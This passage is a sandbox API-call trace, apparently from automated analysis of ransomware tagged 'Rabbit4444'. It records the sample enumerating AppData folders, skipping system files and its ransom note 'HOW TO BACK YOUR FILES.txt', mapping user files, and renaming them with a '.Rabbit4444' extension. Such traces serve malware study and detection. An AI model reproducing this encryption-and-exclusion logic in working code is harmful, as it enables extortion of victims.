WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0061.069] FlushFileBuffers (hFile=0x27c) returned 1 [0061.070] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\SystemAppData\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0061.070] CloseHandle (hObject=0x27c) returned 1 [0061.071] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\SystemAppData") returned 86 [0061.071] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0061.071] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\SystemAppData\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8efa262b, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x8efa262b, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xedb98eaa, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102810 [0061.071] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0061.071] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0061.071] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0061.071] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0061.071] FindNextFileW (in: hFindFile=0x102810, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8efa262b, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x8efa262b, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xedb98eaa, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0061.071] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0061.071] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0061.071] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0061.071] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0061.071] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0061.071] FindNextFileW (in: hFindFile=0x102810, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xedb98eaa, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xedb98eaa, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xedb98eaa, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0061.071] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0061.071] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0061.071] FindNextFileW (in: hFindFile=0x102810, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xedb98eaa, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xedb98eaa, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xedb98eaa, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0061.071] FindClose (in: hFindFile=0x102810 | out: hFindFile=0x102810) returned 1 [0061.072] lstrcpyW (in: lpString1=0x130ebe6, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0061.072] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\SystemAppData\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.zunevideo_8wekyb3d8bbwe\\systemappdata\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0061.072] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x2a0 [0061.072] MapViewOfFile (hFileMappingObject=0x2a0, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0061.073] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0061.073] CloseHandle (hObject=0x2a0) returned 1 [0061.073] CloseHandle (hObject=0x27c) returned 1 [0061.073] GetCurrentThreadId () returned 0xd98 [0061.073] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x121fe8 [0061.073] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\Settings", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\Settings") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\Settings" [0061.073] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117e18 | out: hHeap=0xe0000) returned 1 [0061.073] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x121fe0 | out: hHeap=0xe0000) returned 1 [0061.073] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\Settings" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\Settings") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\Settings" [0061.073] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\Settings", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\Settings\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\Settings\\" [0061.073] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\Settings\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\Settings\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\Settings\\.BFC0E91B00AE8A0620D3" [0061.073] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\Settings\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.zunevideo_8wekyb3d8bbwe\\settings\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0061.078] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0061.213] FlushFileBuffers (hFile=0x27c) returned 1 [0061.215] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\Settings\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0061.215] CloseHandle (hObject=0x27c) returned 1 [0061.215] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\Settings") returned 81 [0061.215] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0061.216] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\Settings\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf67c392c, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0x713b1523, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xedb98eaa, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102590 [0061.216] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0061.216] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0061.216] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0061.216] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0061.216] FindNextFileW (in: hFindFile=0x102590, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf67c392c, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0x713b1523, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xedb98eaa, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0061.216] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0061.216] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0061.216] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0061.216] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0061.216] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0061.216] FindNextFileW (in: hFindFile=0x102590, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xedb98eaa, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xedb98eaa, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xedcf03bb, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0061.216] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0061.216] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0061.216] FindNextFileW (in: hFindFile=0x102590, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf685c2d2, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xf685c2d2, ftLastAccessTime.dwHighDateTime=0x1d32714, ftLastWriteTime.dwLowDateTime=0xf685c2d2, ftLastWriteTime.dwHighDateTime=0x1d32714, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="roaming.lock", cAlternateFileName="ROAMIN~1.LOC")) returned 1 [0061.216] lstrcmpiW (lpString1="roaming.lock", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0061.216] lstrcmpiW (lpString1="roaming.lock", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0061.216] lstrcmpiW (lpString1="roaming.lock", lpString2="Rabbit4444.exe") returned 1 [0061.216] lstrcmpiW (lpString1="roaming.lock", lpString2=".") returned 1 [0061.216] lstrcmpiW (lpString1="roaming.lock", lpString2="..") returned 1 [0061.216] lstrcmpiW (lpString1="roaming.lock", lpString2="windows") returned -1 [0061.216] lstrcmpiW (lpString1="roaming.lock", lpString2="bootmgr") returned 1 [0061.216] lstrcmpiW (lpString1="roaming.lock", lpString2="pagefile.sys") returned 1 [0061.216] lstrcmpiW (lpString1="roaming.lock", lpString2="boot") returned 1 [0061.216] lstrcmpiW (lpString1="roaming.lock", lpString2="ids.txt") returned 1 [0061.216] lstrcmpiW (lpString1="roaming.lock", lpString2="NTUSER.DAT") returned 1 [0061.216] lstrcpyW (in: lpString1=0x130ebdc, lpString2="roaming.lock" | out: lpString1="roaming.lock") returned="roaming.lock" [0061.216] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\Settings\\roaming.lock", dwFileAttributes=0x0) returned 1 [0061.217] lstrlenW (lpString="roaming.lock") returned 12 [0061.217] lstrlenW (lpString="Rabbit4444") returned 10 [0061.217] lstrcmpiW (lpString1="aming.lock", lpString2="Rabbit4444") returned -1 [0061.217] lstrlenW (lpString=".dll") returned 4 [0061.217] lstrcmpiW (lpString1="lock", lpString2=".dll") returned 1 [0061.217] lstrlenW (lpString=".lnk") returned 4 [0061.217] lstrcmpiW (lpString1="lock", lpString2=".lnk") returned 1 [0061.217] lstrlenW (lpString=".ini") returned 4 [0061.217] lstrcmpiW (lpString1="lock", lpString2=".ini") returned 1 [0061.217] lstrlenW (lpString=".sys") returned 4 [0061.217] lstrcmpiW (lpString1="lock", lpString2=".sys") returned 1 [0061.217] FindNextFileW (in: hFindFile=0x102590, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf67c392c, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0x8efa262b, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x11d3fb2a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="settings.dat", cAlternateFileName="")) returned 1 [0061.218] lstrcmpiW (lpString1="settings.dat", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0061.218] lstrcmpiW (lpString1="settings.dat", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0061.218] lstrcmpiW (lpString1="settings.dat", lpString2="Rabbit4444.exe") returned 1 [0061.218] lstrcmpiW (lpString1="settings.dat", lpString2=".") returned 1 [0061.218] lstrcmpiW (lpString1="settings.dat", lpString2="..") returned 1 [0061.218] lstrcmpiW (lpString1="settings.dat", lpString2="windows") returned -1 [0061.218] lstrcmpiW (lpString1="settings.dat", lpString2="bootmgr") returned 1 [0061.218] lstrcmpiW (lpString1="settings.dat", lpString2="pagefile.sys") returned 1 [0061.218] lstrcmpiW (lpString1="settings.dat", lpString2="boot") returned 1 [0061.218] lstrcmpiW (lpString1="settings.dat", lpString2="ids.txt") returned 1 [0061.218] lstrcmpiW (lpString1="settings.dat", lpString2="NTUSER.DAT") returned 1 [0061.218] lstrcpyW (in: lpString1=0x130ebdc, lpString2="settings.dat" | out: lpString1="settings.dat") returned="settings.dat" [0061.218] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\Settings\\settings.dat", dwFileAttributes=0x0) returned 1 [0061.219] lstrlenW (lpString="settings.dat") returned 12 [0061.219] lstrlenW (lpString="Rabbit4444") returned 10 [0061.219] lstrcmpiW (lpString1="ttings.dat", lpString2="Rabbit4444") returned 1 [0061.219] lstrlenW (lpString=".dll") returned 4 [0061.219] lstrcmpiW (lpString1=".dat", lpString2=".dll") returned -1 [0061.219] lstrlenW (lpString=".lnk") returned 4 [0061.219] lstrcmpiW (lpString1=".dat", lpString2=".lnk") returned -1 [0061.219] lstrlenW (lpString=".ini") returned 4 [0061.219] lstrcmpiW (lpString1=".dat", lpString2=".ini") returned -1 [0061.219] lstrlenW (lpString=".sys") returned 4 [0061.219] lstrcmpiW (lpString1=".dat", lpString2=".sys") returned -1 [0061.219] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\Settings\\settings.dat" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.zunevideo_8wekyb3d8bbwe\\settings\\settings.dat"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2a0 [0061.219] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0061.219] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15253013813) returned 1 [0061.219] GetFileSizeEx (in: hFile=0x2a0, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=8192) returned 1 [0061.220] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117950 [0061.220] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101fb8 [0061.220] CreateFileMappingW (hFile=0x2a0, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x2300, lpName=0x0) returned 0x29c [0061.221] MapViewOfFile (hFileMappingObject=0x29c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x2300) returned 0x70000 [0061.223] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x123760 [0061.223] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1098e8 [0061.223] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x123760 | out: hHeap=0xe0000) returned 1 [0061.223] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109370 [0061.223] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x123760 [0061.223] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109370 | out: hHeap=0xe0000) returned 1 [0061.223] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x123760 | out: hHeap=0xe0000) returned 1 [0061.223] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1098e8 | out: hHeap=0xe0000) returned 1 [0061.223] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15253424124) returned 1 [0061.224] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117950 | out: hHeap=0xe0000) returned 1 [0061.224] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101fb8 | out: hHeap=0xe0000) returned 1 [0061.224] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0061.224] CloseHandle (hObject=0x29c) returned 1 [0061.224] CloseHandle (hObject=0x2a0) returned 1 [0061.224] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\Settings\\settings.dat.Rabbit4444") returned 105 [0061.224] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\Settings\\settings.dat" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.zunevideo_8wekyb3d8bbwe\\settings\\settings.dat"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\Settings\\settings.dat.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.zunevideo_8wekyb3d8bbwe\\settings\\settings.dat.rabbit4444"), dwFlags=0x1) returned 1 [0061.225] FindNextFileW (in: hFindFile=0x102590, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xdac65b0d, ftCreationTime.dwHighDateTime=0x1d32735, ftLastAccessTime.dwLowDateTime=0xdac65b0d, ftLastAccessTime.dwHighDateTime=0x1d32735, ftLastWriteTime.dwLowDateTime=0xdac65b0d, ftLastWriteTime.dwHighDateTime=0x1d32735, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="settings.dat.LOG1", cAlternateFileName="SETTIN~1.LOG")) returned 1 [0061.225] lstrcmpiW (lpString1="settings.dat.LOG1", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0061.225] lstrcmpiW (lpString1="settings.dat.LOG1", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0061.225] lstrcmpiW (lpString1="settings.dat.LOG1", lpString2="Rabbit4444.exe") returned 1 [0061.225] lstrcmpiW (lpString1="settings.dat.LOG1", lpString2=".") returned 1 [0061.225] lstrcmpiW (lpString1="settings.dat.LOG1", lpString2="..") returned 1 [0061.225] lstrcmpiW (lpString1="settings.dat.LOG1", lpString2="windows") returned -1 [0061.225] lstrcmpiW (lpString1="settings.dat.LOG1", lpString2="bootmgr") returned 1 [0061.225] lstrcmpiW (lpString1="settings.dat.LOG1", lpString2="pagefile.sys") returned 1 [0061.225] lstrcmpiW (lpString1="settings.dat.LOG1", lpString2="boot") returned 1 [0061.225] lstrcmpiW (lpString1="settings.dat.LOG1", lpString2="ids.txt") returned 1 [0061.225] lstrcmpiW (lpString1="settings.dat.LOG1", lpString2="NTUSER.DAT") returned 1 [0061.225] lstrcpyW (in: lpString1=0x130ebdc, lpString2="settings.dat.LOG1" | out: lpString1="settings.dat.LOG1") returned="settings.dat.LOG1" [0061.225] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\Settings\\settings.dat.LOG1", dwFileAttributes=0x22) returned 1 [0061.226] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\Settings\\settings.dat.LOG1", dwFileAttributes=0x6) returned 1 [0061.226] lstrlenW (lpString="settings.dat.LOG1") returned 17 [0061.226] lstrlenW (lpString="Rabbit4444") returned 10 [0061.226] lstrcmpiW (lpString1="s.dat.LOG1", lpString2="Rabbit4444") returned 1 [0061.226] lstrlenW (lpString=".dll") returned 4 [0061.226] lstrcmpiW (lpString1="LOG1", lpString2=".dll") returned 1 [0061.226] lstrlenW (lpString=".lnk") returned 4 [0061.226] lstrcmpiW (lpString1="LOG1", lpString2=".lnk") returned 1 [0061.226] lstrlenW (lpString=".ini") returned 4 [0061.226] lstrcmpiW (lpString1="LOG1", lpString2=".ini") returned 1 [0061.226] lstrlenW (lpString=".sys") returned 4 [0061.226] lstrcmpiW (lpString1="LOG1", lpString2=".sys") returned 1 [0061.226] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\Settings\\settings.dat.LOG1" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.zunevideo_8wekyb3d8bbwe\\settings\\settings.dat.log1"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2a0 [0061.227] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0061.227] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15253731582) returned 1 [0061.227] GetFileSizeEx (in: hFile=0x2a0, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=8192) returned 1 [0061.227] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117680 [0061.227] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101b78 [0061.227] CreateFileMappingW (hFile=0x2a0, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x2300, lpName=0x0) returned 0x29c [0061.228] MapViewOfFile (hFileMappingObject=0x29c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x2300) returned 0x70000 [0061.229] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x123760 [0061.229] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1096b8 [0061.229] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x123760 | out: hHeap=0xe0000) returned 1 [0061.229] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1097d0 [0061.229] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x123760 [0061.230] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1097d0 | out: hHeap=0xe0000) returned 1 [0061.230] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x123760 | out: hHeap=0xe0000) returned 1 [0061.230] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1096b8 | out: hHeap=0xe0000) returned 1 [0061.230] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15254045928) returned 1 [0061.230] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117680 | out: hHeap=0xe0000) returned 1 [0061.230] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101b78 | out: hHeap=0xe0000) returned 1 [0061.230] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0061.230] CloseHandle (hObject=0x29c) returned 1 [0061.230] CloseHandle (hObject=0x2a0) returned 1 [0061.230] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\Settings\\settings.dat.LOG1.Rabbit4444") returned 110 [0061.230] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\Settings\\settings.dat.LOG1" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.zunevideo_8wekyb3d8bbwe\\settings\\settings.dat.log1"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\Settings\\settings.dat.LOG1.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.zunevideo_8wekyb3d8bbwe\\settings\\settings.dat.log1.rabbit4444"), dwFlags=0x1) returned 1 [0061.231] FindNextFileW (in: hFindFile=0x102590, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xdac65b0d, ftCreationTime.dwHighDateTime=0x1d32735, ftLastAccessTime.dwLowDateTime=0xdac65b0d, ftLastAccessTime.dwHighDateTime=0x1d32735, ftLastWriteTime.dwLowDateTime=0xdac65b0d, ftLastWriteTime.dwHighDateTime=0x1d32735, 